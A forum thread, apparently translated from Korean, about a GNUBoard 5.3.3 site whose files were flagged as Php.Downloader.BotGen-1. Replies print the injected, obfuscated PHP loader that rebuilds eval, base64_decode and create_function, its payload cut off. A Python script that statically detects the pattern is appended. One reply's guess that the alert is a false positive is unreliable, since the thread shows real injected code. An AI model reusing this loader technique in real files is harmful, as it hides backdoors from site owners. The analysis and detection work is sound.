File virus infection


I am using GNUBoard version 5.3.3 on a server at an overseas hosting company.

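I was testing it before putting it into real use when I received an email saying that files were infected with a virus (Php.Downloader.BotGen-1). When I checked, there really was strange code included in them. According to the hosting company, the CMS I am using has weak security; does the latest version not have this problem?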

\adm\index.php: Php.Downloader.BotGen-1 FOUND
\adm\sms_admin\config.php: Php.Downloader.BotGen-1 FOUND
\config.php: Php.Downloader.BotGen-1 FOUND
\index.php: Php.Downloader.BotGen-1 FOUND
\install\index.php: Php.Downloader.BotGen-1 FOUND
\mobile\index.php: Php.Downloader.BotGen-1 FOUND
\plugin\editor\cheditor5\imageUpload\config.php: Php.Downloader.BotGen-1 FOUND
\plugin\editor\smarteditor2\photo_uploader\popup\php\index.php: Php.Downloader.BotGen-1 FOUND
\plugin\sms5\index.php: Php.Downloader.BotGen-1 FOUND
\plugin\sns\facebook\tests\bootstrap.php: Php.Downloader.BotGen-1 FOUND
\plugin\sns\twitter\index.php: Php.Downloader.BotGen-1 FOUND
\plugin\social\config.php: Php.Downloader.BotGen-1 FOUND
\plugin\social\includes\functions.php: Php.Downloader.BotGen-1 FOUND
\plugin\social\index.php: Php.Downloader.BotGen-1 FOUND
\theme\basic\index.php: Php.Downloader.BotGen-1 FOUND
\theme\basic\mobile\index.php: Php.Downloader.BotGen-1 FOUND


3 answers

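Looks like a false positive?

Try emailing them to ask which code is vulnerable.

Also, when using overseas hosting, false virus detections sometimes come up because of character-set differences.

If you use GNUBoard 5.4, there should be no problem.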

 

Try running a check on that server with PHP Malware Scanner.

https://www.phpclasses.org/package/11074-PHP-Scan-PHP-files-to-find-malicious-code.html

When I actually opened the files, I could see that code like the following had been added.

<?php
// (in the infected file a long run of spaces follows "<?php" here, pushing the code below off-screen)
_reporting(0);
@ini_set('display_errors', 0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('error_reporting', 0);
@ini_set('display_startup_errors', 0);
// three identically written wrappers around str_replace
function ToSJa1QEZFVIthfxHCBC6($Is8og439q,$z9po05TQA,$MUMuhjXJL){return str_replace($Is8og439q,$z9po05TQA,$MUMuhjXJL);}
function sdzwe5DAUwgcX6O3($Is8og439q,$z9po05TQA,$MUMuhjXJL){return str_replace($Is8og439q,$z9po05TQA,$MUMuhjXJL);}
function s2QrBZMfzhvwXWigD8YqSY($Is8og439q,$z9po05TQA,$MUMuhjXJL){return str_replace($Is8og439q,$z9po05TQA,$MUMuhjXJL);}
// with the filler string stripped out, this becomes "base64_decode"
$O9KBEcpT1Z4ll8O5EGqJ0Faj = 'bN2fAkLxkmYOoexg3ssfq6aaN2fAkLxkmYOoexg3ssfq6asN2fAkLxkmYOoexg3ssfq6aeN2fAkLxkmYOoexg3ssfq6a6N2fAkLxkmYOoexg3ssfq6a4N2fAkLxkmYOoexg3ssfq6a_N2fAkLxkmYOoexg3ssfq6adN2fAkLxkmYOoexg3ssfq6aeN2fAkLxkmYOoexg3ssfq6acN2fAkLxkmYOoexg3ssfq6aoN2fAkLxkmYOoexg3ssfq6adN2fAkLxkmYOoexg3ssfq6ae';
$O9KBEcpT1Z4ll8O5EGqJ0Faj = s2QrBZMfzhvwXWigD8YqSY('N2fAkLxkmYOoexg3ssfq6a','',$O9KBEcpT1Z4ll8O5EGqJ0Faj);
// with the filler string stripped out, this becomes "create_function"
$hVGidB9zilH = 'cXrutWuCIjuNKFprXrutWuCIjuNKFpeXrutWuCIjuNKFpaXrutWuCIjuNKFptXrutWuCIjuNKFpeXrutWuCIjuNKFp_XrutWuCIjuNKFpfXrutWuCIjuNKFpuXrutWuCIjuNKFpnXrutWuCIjuNKFpcXrutWuCIjuNKFptXrutWuCIjuNKFpiXrutWuCIjuNKFpoXrutWuCIjuNKFpn';
$hVGidB9zilH = s2QrBZMfzhvwXWigD8YqSY('XrutWuCIjuNKFp','',$hVGidB9zilH);
// with the filler string stripped out, this becomes "eval"
$bkXytTxV7EX1jxCyKIC4u8 = 'rBVtQ0RXT9fYpcZaFgerBVtQ0RXT9fYpcZaFgvrBVtQ0RXT9fYpcZaFgarBVtQ0RXT9fYpcZaFgl';
$bkXytTxV7EX1jxCyKIC4u8 = s2QrBZMfzhvwXWigD8YqSY('rBVtQ0RXT9fYpcZaFg','',$bkXytTxV7EX1jxCyKIC4u8);
$mAbXInuReFECY = '$dNOHi68Bnhc4OJKpng';
// builds a function whose body is eval(base64_decode($dNOHi68Bnhc4OJKpng));
$BJltwdCTG1ufuoAsrYTsLs = $hVGidB9zilH($mAbXInuReFECY,$bkXytTxV7EX1jxCyKIC4u8.'('.$O9KBEcpT1Z4ll8O5EGqJ0Faj.'('.$mAbXInuReFECY.'));');
// called with one very long base64-encoded string literal, which is cut off in the original post and omitted here
$BJltwdCTG1ufuoAsrYTsLs(
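A static check for the loader pattern in the code posted above, as an added example that is not part of the original thread: it reverses the str_replace filler-stripping without executing anything, reports which function names the file is hiding, and flags the whitespace padding and the long encoded literal. The thresholds (200 spaces, 500 characters), the SUSPICIOUS list, the function name scan_php and both sample strings are assumptions made for this example.

```python
import re

# Names this kind of loader rebuilds at run time so they never appear in the file.
SUSPICIOUS = {"eval", "assert", "base64_decode", "create_function", "gzinflate"}

# function w($a,$b,$c){return str_replace($a,$b,$c);}  -> a renamed str_replace
WRAPPER = re.compile(r"function\s+(\w+)\s*\(([^)]*)\)\s*\{\s*return\s+str_replace\(\2\)\s*;\s*\}")
# $v = 'literal';
ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'\s*;")
# $v = w('junk','',$src);
STRIP = re.compile(r"\$(\w+)\s*=\s*(\w+)\(\s*'([^']+)'\s*,\s*''\s*,\s*\$(\w+)\s*\)\s*;")
PADDING = re.compile(r"<\?php[ \t]{200,}\S")      # code pushed off-screen
LONG_B64 = re.compile(r"'[A-Za-z0-9+/=]{500,}'")   # large encoded literal


def scan_php(source):
    """Statically inspect PHP source text; nothing from the file is executed."""
    findings = []
    if PADDING.search(source):
        findings.append("padding after <?php")
    if LONG_B64.search(source):
        findings.append("long base64-like literal")
    replacers = {"str_replace"} | {m.group(1) for m in WRAPPER.finditer(source)}
    literals = dict(ASSIGN.findall(source))
    for target, func, junk, src in STRIP.findall(source):
        if func not in replacers or src not in literals:
            continue
        literals[target] = literals[src].replace(junk, "")
        if literals[target].lower() in SUSPICIOUS:
            findings.append(f"${target} resolves to {literals[target]}")
    return findings


# Constructed samples (not taken from the infected files on this page).
SAMPLE_INFECTED = (
    "<?php" + " " * 300 + "@ini_set('display_errors', 0);"
    "function w1($a,$b,$c){return str_replace($a,$b,$c);} "
    "$f1 = '" + "QzX9".join("base64_decode") + "'; $f1 = w1('QzX9','',$f1); "
    "$f2 = '" + "Kp7".join("eval") + "'; $f2 = w1('Kp7','',$f2); "
    "$run('" + "QUJD" * 200 + "');"
)
SAMPLE_CLEAN = "<?php\n$slug = 'my-first-post'; $slug = str_replace('-','',$slug); echo $slug;\n"

if __name__ == "__main__":
    for name, text in (("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)):
        print(name, scan_php(text))
```

A hit on any of these in files that were clean at install time is a reason to compare the file against the release archive of the same GNUBoard version rather than to trust the file.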
